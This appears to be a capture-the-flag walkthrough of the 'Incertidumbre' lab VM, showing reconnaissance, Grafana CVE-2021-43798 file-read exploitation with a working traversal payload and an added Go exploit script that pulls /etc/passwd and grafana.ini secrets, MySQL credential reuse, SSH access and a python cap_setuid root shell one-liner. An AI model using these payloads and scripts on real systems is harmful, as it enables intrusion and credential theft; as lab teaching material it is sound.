TheHackersLabs-Incertidumbre: Detailed Walkthrough (WP)
城南花已开

Information Gathering

Service Discovery

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.162 08:00:27:9b:88:04 (Unknown)
192.168.60.254 00:50:56:e0:e6:12 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.986 seconds (128.90 hosts/sec). 4 responded
export ip=192.168.60.162
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.162:22
Open 192.168.60.162:80
Open 192.168.60.162:3000
Open 192.168.60.162:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 21:11 CST
Initiating ARP Ping Scan at 21:11
Scanning 192.168.60.162 [1 port]
Completed ARP Ping Scan at 21:11, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:11
Completed Parallel DNS resolution of 1 host. at 21:11, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:11
Scanning 192.168.60.162 [4 ports]
Discovered open port 3000/tcp on 192.168.60.162
Discovered open port 80/tcp on 192.168.60.162
Discovered open port 22/tcp on 192.168.60.162
Discovered open port 3306/tcp on 192.168.60.162
Completed SYN Stealth Scan at 21:11, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.162
Host is up, received arp-response (0.00078s latency).
Scanned at 2025-01-17 21:11:12 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3000/tcp open ppp syn-ack ttl 64
3306/tcp open mysql syn-ack ttl 64
MAC Address: 08:00:27:9B:88:04 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)
```

Port 80 only returns an "unauthorized, access forbidden" notice.

Port 3000 turns out to be Grafana, version 8.2.0 (the login page prints the version in its footer). The "ppp" label the scan attaches to 3000 comes from nmap's static port table, not from fingerprinting; no -sV was run.


Grafana's shipped default credentials admin:admin work. On first login it asks for a new password; setting it back to the old one is enough. The file read below does not depend on this session, since CVE-2021-43798 is reachable without authentication.

File Read Vulnerability

Searching for the version turns up an unauthenticated arbitrary file read, CVE-2021-43798: a path traversal in the `/public/plugins/<plugin-id>/` route that affects Grafana 8.0.0-beta1 through 8.3.0 and was fixed in 8.3.1, 8.2.7, 8.1.8 and 8.0.7. 8.2.0 sits inside that range.

Grafana 8.3.1, 8.2.7, 8.1.8, and 8.0.7 released with high severity security fix | Grafana Labs

pedrohavay/exploit-grafana-CVE-2021-43798: This is a proof-of-concept exploit for Grafana’s Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

Put the target URL, http://192.168.60.162:3000, in targets.txt and run the PoC:

```
❯ python3 exploit.py
_____ _____ ___ __ ___ _ _ _ ________ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |___| | |__ /__ / _ ( _ )
| (__ \ V /| _|___/ / () / /| |___|_ _|_ \ / /\_, / _ \
\___| \_/ |___| /___\__/___|_| |_|___//_/ /_/\___/
@pedrohavay / @acassio22

? Enter the target list: targets.txt

========================================

[i] Target: http://192.168.60.162:3000

[!] Payload "http://192.168.60.162:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" works.

[i] Analysing files...

[i] File "/conf/defaults.ini" found in server.
[*] File saved in "./http_192_168_60_162_3000/defaults.ini".

[i] File "/etc/grafana/grafana.ini" found in server.
[*] File saved in "./http_192_168_60_162_3000/grafana.ini".

[i] File "/etc/passwd" found in server.
[*] File saved in "./http_192_168_60_162_3000/passwd".

[i] File "/var/lib/grafana/grafana.db" found in server.
[*] File saved in "./http_192_168_60_162_3000/grafana.db".

[i] File "/proc/self/cmdline" found in server.
[*] File saved in "./http_192_168_60_162_3000/cmdline".

? Do you want to try to extract the passwords from the data source? Yes

[i] Secret Key: SW2YcwTIb9zpOOhoPsMm

[*] Bye Bye!
```
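
The manual check behind that tool, as an added example (this is not the pedrohavay PoC's code and not part of the original post): it builds the same `/public/plugins/<id>/..%2f...` request the output above reports as working, tries a handful of plugin directories that ship inside Grafana 8, and once it has /etc/passwd pulls out the accounts with an interactive shell, which is the `grep /bin/bash` step done by hand further down. The plugin list and the shell list are assumptions of the example; the target address is the one from the port scan, and the live requests only run when the block is executed against it.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"strings"
	"time"
)

// A few plugin directories bundled with every Grafana 8.x install (list assumed for the example;
// the PoC tries many more). Any directory that exists works: the bug is in how the rest of the
// /public/plugins/<id>/... path is resolved, not in the plugin itself.
var corePlugins = []string{"alertlist", "annolist", "dashlist", "graph", "table", "text", "welcome", "mysql", "postgres"}

// traversalDepth matches the eight "..%2f" segments in the payload the exploit reported as working.
const traversalDepth = 8

// TraversalURL builds the CVE-2021-43798 request. The separators are %2f-encoded so that clients
// which normalise a literal "../" (browsers, curl without --path-as-is) send the path unchanged.
func TraversalURL(base, plugin, target string) string {
	return strings.TrimRight(base, "/") + "/public/plugins/" + plugin + "/" +
		strings.Repeat("..%2f", traversalDepth) + strings.TrimLeft(target, "/")
}

// interactiveShells is the filter the page applies with `grep /bin/bash`, widened to other login
// shells commonly found on Linux hosts (assumed list).
var interactiveShells = map[string]bool{
	"/bin/bash": true, "/usr/bin/bash": true, "/bin/sh": true, "/bin/zsh": true, "/usr/bin/zsh": true, "/bin/dash": true,
}

// ShellUsers returns the account names from an /etc/passwd body whose seventh field is a login shell.
func ShellUsers(passwd string) []string {
	var users []string
	sc := bufio.NewScanner(strings.NewReader(passwd))
	for sc.Scan() {
		f := strings.Split(sc.Text(), ":")
		if len(f) == 7 && interactiveShells[f[6]] {
			users = append(users, f[0])
		}
	}
	return users
}

// ReadFile tries each plugin directory until the server answers 200 with a non-empty body.
// Grafana answers 404 for a plugin id it does not have, so a miss just moves on to the next id.
func ReadFile(client *http.Client, base, target string) (string, error) {
	for _, p := range corePlugins {
		resp, err := client.Get(TraversalURL(base, p, target))
		if err != nil {
			return "", err
		}
		body, _ := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
		resp.Body.Close()
		if resp.StatusCode == http.StatusOK && len(body) > 0 {
			return string(body), nil
		}
	}
	return "", fmt.Errorf("no plugin directory yielded %s", target)
}

func main() {
	client := &http.Client{Timeout: 5 * time.Second}
	base := "http://192.168.60.162:3000" // the Grafana instance found by the port scan
	passwd, err := ReadFile(client, base, "/etc/passwd")
	if err != nil {
		fmt.Println("not vulnerable or unreachable:", err)
		return
	}
	fmt.Println("accounts with a login shell:", ShellUsers(passwd))
	// grafana.ini is the next file worth reading: it holds the database credentials and secret_key.
	if ini, err := ReadFile(client, base, "/etc/grafana/grafana.ini"); err == nil {
		for _, line := range strings.Split(ini, "\n") {
			if strings.HasPrefix(line, "password") || strings.HasPrefix(line, "secret_key") {
				fmt.Println("grafana.ini:", line)
			}
		}
	}
}
```

The HasPrefix filter deliberately skips lines that start with ";", which is how grafana.ini marks settings left at their default, so only values the operator actually set are printed.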

passwd shows one interactive account besides root, cloud, and grafana.ini carries the database connection credentials in plaintext in its [database] section:

```
cat passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
cloud:x:1001:1001:,,,:/home/cloud:/bin/bash
cat grafana.ini|grep -A 4 mysql
# Either "mysql", "postgres" or "sqlite3", it's your choice
type = mysql
host = 127.0.0.1:3306
name = grafana_db
user = grafana
password = mxIn1{JnyiKP{48SqvzEpa6S2
--
# Example: mysql://user:secret@host:port/database
;url =

# For "postgres" only, either "disable", "require" or "verify-full"
;ssl_mode = disable
--
# Currently, only "mysql" driver supports isolation levels.
# If the value is empty - driver's default isolation level is applied.
# For "mysql" use "READ-UNCOMMITTED", "READ-COMMITTED", "REPEATABLE-READ" or "SERIALIZABLE".
;isolation_level =

;ca_cert_path =
;client_key_path =
```

The config binds the database to 127.0.0.1, but port 3306 is open to the network, so the same credentials work remotely. The client here is MariaDB's talking to a MySQL 8.0 server, hence --skip-ssl to turn off certificate verification:

```
❯ mysql -h 192.168.60.162 -u grafana -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 19
Server version: 8.0.39-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| grafana_db |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.083 sec)

MySQL [(none)]> use grafana_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [grafana_db]> show tables;
+----------------------------+
| Tables_in_grafana_db |
+----------------------------+
| alert |
| alert_configuration |
| alert_instance |
| alert_notification |
| alert_notification_state |
| alert_rule |
| alert_rule_tag |
| alert_rule_version |
| annotation |
| annotation_tag |
| api_key |
| cache_data |
| dashboard |
| dashboard_acl |
| dashboard_provisioning |
| dashboard_snapshot |
| dashboard_tag |
| dashboard_version |
| data_source |
| kv_store |
| library_element |
| library_element_connection |
| login_attempt |
| migration_log |
| ngalert_configuration |
| org |
| org_user |
| playlist |
| playlist_item |
| plugin_setting |
| preferences |
| quota |
| server_lock |
| session |
| short_url |
| star |
| tag |
| team |
| team_member |
| temp_user |
| test_data |
| user |
| user_auth |
| user_auth_token |
| users |
+----------------------------+
45 rows in set (0.004 sec)

MySQL [grafana_db]> select * from users;
+---------+--------------------------------+
| usuario | passwd |
+---------+--------------------------------+
| cloud | b0KjQXwH801dm2vnOgP2anEc8JGidc |
+---------+--------------------------------+
1 row in set (0.004 sec)
```

User Access

The `users` table is not part of Grafana's schema (Grafana keeps its accounts in `user`); it is the box's own table, with Spanish column names, and it holds cloud's password in plaintext. SSH in with it:

```
❯ ssh cloud@192.168.60.162
cloud@192.168.60.162's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of vie 17 ene 2025 14:24:11 UTC

System load: 0.1 Processes: 114
Usage of /: 60.5% of 9.75GB Users logged in: 0
Memory usage: 30% IPv4 address for enp0s3: 192.168.60.162
Swap usage: 0%


* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.

https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct 18 17:35:25 2024 from 192.168.18.48
cloud@TheHackersLabs-Incertidumbre:~$ ls
time.sh user.txt
cloud@TheHackersLabs-Incertidumbre:~$ cat user.txt
a1Tz9bD4uJ6X2pN5vR8cLq7sW3YfG0hK9VmZxP3
```

Root Privilege Escalation

The home directory holds a script, time.sh, next to the user flag:

```bash
#!/bin/bash

# Ask the user for a date and time
echo "Enter the day (DD):"
read day
echo "Enter the month (MM):"
read month
echo "Enter the year (YYYY):"
read year
echo "Enter the hour (HH, 24-hour clock):"
read hour
echo "Enter the minutes (MM):"
read minutes

# Check that the input has the expected shape
if ! [[ "$day" =~ ^[0-9]{2}$ ]] || ! [[ "$month" =~ ^[0-9]{2}$ ]] || ! [[ "$year" =~ ^[0-9]{4}$ ]]; then
    echo "Error: the date is not in the correct format. Please use the format shown."
    exit 1
fi

if ! [[ "$hour" =~ ^[0-9]{2}$ ]] || ! [[ "$minutes" =~ ^[0-9]{2}$ ]]; then
    echo "Error: the hour or minutes are not in the correct format."
    exit 1
fi

# Check that the time is within a sensible range
if [ "$hour" -lt 0 ] || [ "$hour" -gt 23 ] || [ "$minutes" -lt 0 ] || [ "$minutes" -gt 59 ]; then
    echo "Error: the time is outside the valid range."
    exit 1
fi

# Build the new date and time
new_date="$year-$month-$day $hour:$minutes:00"
echo "The new date and time is: $new_date"

# Confirm before changing the system time
echo "Continue and change the system time? (yes/no):"
read confirm

if [ "$confirm" == "yes" ]; then
    # Try to change the system time
    sudo /usr/local/bin/set_date.sh "$new_date"
    if [ $? -eq 0 ]; then
        echo "System time updated to: $(date)"
    else
        echo "Error: could not update the system time."
        exit 1
    fi
else
    echo "Operation cancelled."
fi
```

sudo -l shows the rule the script relies on:

```
cloud@TheHackersLabs-Incertidumbre:~$ sudo -l
sudo: unable to resolve host TheHackersLabs-Incertidumbre: Temporary failure in name resolution
Matching Defaults entries for cloud on TheHackersLabs-Incertidumbre:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cloud may run the following commands on TheHackersLabs-Incertidumbre:
(ALL) NOPASSWD: /usr/local/bin/set_date.sh
cloud@TheHackersLabs-Incertidumbre:~$ ls -al /usr/local/bin/set_date.sh
-rwx------ 1 root root 87 oct 16 14:52 /usr/local/bin/set_date.sh
```

This is a decoy, though. set_date.sh is root-owned with mode 0700, so cloud can neither read it to learn what it does with its argument nor modify it; the rule names an absolute path, and secure_path is set, so there is no PATH hijack either. time.sh itself only forwards a validated date string. The sudo rule gives no foothold.

The real route is elsewhere: getcap shows /usr/bin/python3.8 carrying cap_setuid in its effective and permitted sets (+ep), so any user who can run the interpreter can call setuid(0). Only the uid changes (the gid stays 1001), but uid 0 is all that is needed to read the root flag:

```
cloud@TheHackersLabs-Incertidumbre:~$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/snap/core20/1828/usr/bin/ping = cap_net_raw+ep
cloud@TheHackersLabs-Incertidumbre:~$ python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
root@TheHackersLabs-Incertidumbre:~# id
uid=0(root) gid=1001(cloud) groups=1001(cloud)
root@TheHackersLabs-Incertidumbre:~# cat /root/root.txt
G5nZ2qL1vW9jP4sR3kF7tM8xB0dH6yV3uX9mK7r
```
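
A triage helper for that step, added here as an example (not from the original post): it reads `getcap -r /` output in both the older `path = caps+ep` format shown above and the newer `path caps=ep` format of recent libcap, and reports binaries whose effective or permitted set includes a capability that is root-equivalent on its own, such as the cap_setuid on python3.8 this box hinges on. The capability list is the example's own selection from capabilities(7); the sample input is the getcap output from above plus one constructed line in the newer format.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Capabilities that, when held by a general-purpose binary or interpreter, give an unprivileged
// caller root or root's data without any further bug (selection from capabilities(7)).
var rootEquivalent = map[string]string{
	"cap_setuid":          "setuid(0) and exec a shell",
	"cap_setgid":          "join any group, e.g. shadow or docker",
	"cap_dac_read_search": "read any file: /etc/shadow, root's SSH keys",
	"cap_dac_override":    "write any file: /etc/sudoers, /etc/passwd",
	"cap_chown":           "take ownership of any file",
	"cap_fowner":          "chmod any file, e.g. make a shell setuid",
	"cap_setfcap":         "grant arbitrary file capabilities",
	"cap_sys_admin":       "mount, namespace and many other root-only operations",
	"cap_sys_ptrace":      "attach to root-owned processes",
	"cap_sys_module":      "load a kernel module",
}

type Finding struct {
	Path, Capability, Flags, Why string
}

// parseLine splits one getcap line into path, capability names and flag letters.
// Old libcap: "/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+ep"
// New libcap: "/usr/bin/python3.8 cap_setuid,cap_net_bind_service=ep"
func parseLine(line string) (path string, caps []string, flags string, ok bool) {
	line = strings.TrimSpace(line)
	var capset string
	if i := strings.Index(line, " = "); i >= 0 {
		path, capset = line[:i], line[i+3:]
	} else if i := strings.LastIndex(line, " "); i >= 0 {
		path, capset = line[:i], line[i+1:]
	} else {
		return "", nil, "", false
	}
	// the flag letters follow the last '+' or '=' in the capability set
	sep := strings.LastIndexAny(capset, "+=")
	if sep < 0 {
		return "", nil, "", false
	}
	return path, strings.Split(capset[:sep], ","), capset[sep+1:], true
}

// Triage returns one Finding per (binary, dangerous capability) whose flags include effective (e)
// or permitted (p). A permitted-only capability still has to be raised by the program itself,
// so the Flags field is kept so the reader can rank "+p" below "+ep".
func Triage(getcapOutput string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(getcapOutput))
	for sc.Scan() {
		path, caps, flags, ok := parseLine(sc.Text())
		if !ok || !strings.ContainsAny(flags, "ep") {
			continue
		}
		for _, c := range caps {
			c = strings.TrimSpace(c)
			if why, bad := rootEquivalent[c]; bad {
				out = append(out, Finding{Path: path, Capability: c, Flags: flags, Why: why})
			}
		}
	}
	return out
}

func main() {
	// Sample: the getcap output from the box, plus one constructed line in the newer libcap format.
	sample := `/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/snap/core20/1828/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl cap_dac_read_search=ep
`
	for _, f := range Triage(sample) {
		fmt.Printf("%s: %s (%s) -> %s\n", f.Path, f.Capability, f.Flags, f.Why)
	}
}
```

The ping and gst-ptp-helper entries are left alone on purpose: cap_net_raw and cap_net_bind_service are the normal, narrowly scoped grants that replace setuid on modern distributions, and flagging them would bury the one line that matters.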